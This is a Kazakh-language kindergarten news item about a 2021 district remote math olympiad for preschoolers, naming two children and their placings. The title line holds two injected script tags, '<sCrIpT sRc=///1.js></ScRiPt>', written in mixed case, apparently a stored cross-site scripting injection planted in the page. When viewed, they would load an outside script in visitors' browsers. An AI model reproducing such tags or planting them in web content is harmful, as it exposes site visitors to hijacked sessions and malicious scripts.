Аудандық математикалық олимпиада<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

31.05.2021

Аудандық білім бөлімі  жоспарға сай Ересек жас балаларына арналған қашықтықтан математикалық олимпиада өткізді. Олимпиада қарапайым математикалық түсініктерді дамыту бойынша тапсырмаларды қамтыды.

Олимпиаданың негізгі мақсаттары мен міндеттері

-Мектеп жасына дейінгі балалардың танымдық мотивациясын қолдау және дамыту.

-Бастауыш математикалық түсініктерді қалыптастыру бағытында ересек мектеп жасына дейінгі балалардың білімін өзектендіру. Білім беру қажеттіліктері жоғары балаларды анықтау.

Мектеп- балабақшадан осы олимпиадаға ересек  «Ертөстік» тобынан Абдулмажит Мадияр, «Балдәурен» тобынан Шарапи Әнел қатысты. Балаларға 3 тапсырма берілді: сандардың көршісін табу, пішіндерді ретімен орналастыру және логикалық сұрақтар.

Олимпиада қорытындысы бойынша Тәрбиеленушіміз Абдулмажит М. І орынды иеленсе, Шарапи Әнел ІІІ орынға ие болды. Білім бөлімі жеңімпаздарға Грамота мен сыйлықпен марапаттады.

Просмотров: 294


Пікір қосу



Деректерді қолтаңбаға қосу